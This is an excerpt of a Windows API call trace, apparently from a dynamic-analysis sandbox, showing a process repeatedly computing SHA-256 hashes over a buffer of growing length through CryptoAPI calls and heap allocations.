	[0229.989] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231e5e8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e5e8, pdwDataLen=0x128ba4) returned 1
	[0229.989] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.989] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.989] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.990] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.990] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0229.990] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.990] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e610
	[0229.990] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231e610, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e610, pdwDataLen=0x128ba4) returned 1
	[0229.990] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.990] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.990] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.990] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.990] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0229.990] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.990] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e638
	[0229.990] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231e638, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e638, pdwDataLen=0x128ba4) returned 1
	[0229.990] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.990] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.990] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.991] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.991] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0229.991] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.991] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e660
	[0229.991] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231e660, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e660, pdwDataLen=0x128ba4) returned 1
	[0229.991] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.991] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.991] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.992] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.992] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0229.992] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.992] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e688
	[0229.992] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231e688, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e688, pdwDataLen=0x128ba4) returned 1
	[0229.992] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.992] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.992] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.992] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.992] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0229.992] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.992] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e6b0
	[0229.992] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231e6b0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e6b0, pdwDataLen=0x128ba4) returned 1
	[0229.992] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.992] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.992] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.993] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.993] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0229.993] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.993] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e6d8
	[0229.993] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231e6d8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e6d8, pdwDataLen=0x128ba4) returned 1
	[0229.993] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.993] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.993] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.993] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.993] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0229.993] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.993] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e700
	[0229.993] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231e700, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e700, pdwDataLen=0x128ba4) returned 1
	[0229.993] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.993] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.993] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.994] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.994] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0229.994] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.994] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e728
	[0229.994] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231e728, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e728, pdwDataLen=0x128ba4) returned 1
	[0229.994] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.994] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.994] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.994] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.994] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0229.994] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.994] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e750
	[0229.994] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231e750, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e750, pdwDataLen=0x128ba4) returned 1
	[0229.994] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.994] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.994] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.995] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.995] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0229.995] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.995] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e778
	[0229.995] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231e778, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e778, pdwDataLen=0x128ba4) returned 1
	[0229.995] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.995] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.995] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.995] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.995] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0229.995] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.995] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e7a0
	[0229.995] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231e7a0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e7a0, pdwDataLen=0x128ba4) returned 1
	[0229.995] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.995] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.995] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.996] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.996] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0229.996] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.996] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e7c8
	[0229.996] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231e7c8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e7c8, pdwDataLen=0x128ba4) returned 1
	[0229.996] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.996] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.996] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.996] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.996] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0229.996] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.996] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e7f0
	[0229.996] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231e7f0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e7f0, pdwDataLen=0x128ba4) returned 1
	[0229.996] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.997] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.997] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.997] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.997] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0229.997] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.997] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e818
	[0229.997] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231e818, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e818, pdwDataLen=0x128ba4) returned 1
	[0229.997] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.997] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.997] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.997] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.997] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0229.997] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.997] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e840
	[0229.998] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231e840, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e840, pdwDataLen=0x128ba4) returned 1
	[0229.998] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.998] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.998] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.998] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.998] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0229.998] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.998] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e868
	[0229.998] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231e868, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e868, pdwDataLen=0x128ba4) returned 1
	[0229.998] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.998] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.998] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.998] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.998] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0229.998] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.999] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e890
	[0229.999] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231e890, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e890, pdwDataLen=0x128ba4) returned 1
	[0229.999] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.999] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.999] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.999] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.999] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0229.999] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.999] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e8b8
	[0229.999] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231e8b8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e8b8, pdwDataLen=0x128ba4) returned 1
	[0229.999] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.999] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.999] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.999] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.999] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0230.000] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0230.000] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e8e0
	[0230.000] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231e8e0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e8e0, pdwDataLen=0x128ba4) returned 1
	[0230.000] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0230.000] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0230.000] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0230.000] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0230.000] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0230.000] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0230.000] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e908
	[0230.000] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231e908, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e908, pdwDataLen=0x128ba4) returned 1
	[0230.000] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0230.000] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0230.000] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0230.001] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0230.001] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0230.001] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0230.001] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e930
	[0230.001] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231e930, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e930, pdwDataLen=0x128ba4) returned 1
	[0230.001] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0230.001] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0230.001] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0230.001] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0230.001] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0230.001] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0230.001] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e958
	[0230.001] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231e958, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e958, pdwDataLen=0x128ba4) returned 1
	[0230.001] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0230.001] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0230.001] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0230.002] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0230.002] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0230.002] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0230.002] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e980
	[0230.002] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231e980, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e980, pdwDataLen=0x128ba4) returned 1
	[0230.002] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0230.002] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0230.002] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0230.002] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0230.002] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0230.002] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0230.002] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e9a8
	[0230.002] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231e9a8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e9a8, pdwDataLen=0x128ba4) returned 1
	[0230.002] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0230.002] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0230.002] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0230.003] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0230.003] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0230.003] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0230.003] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e9d0
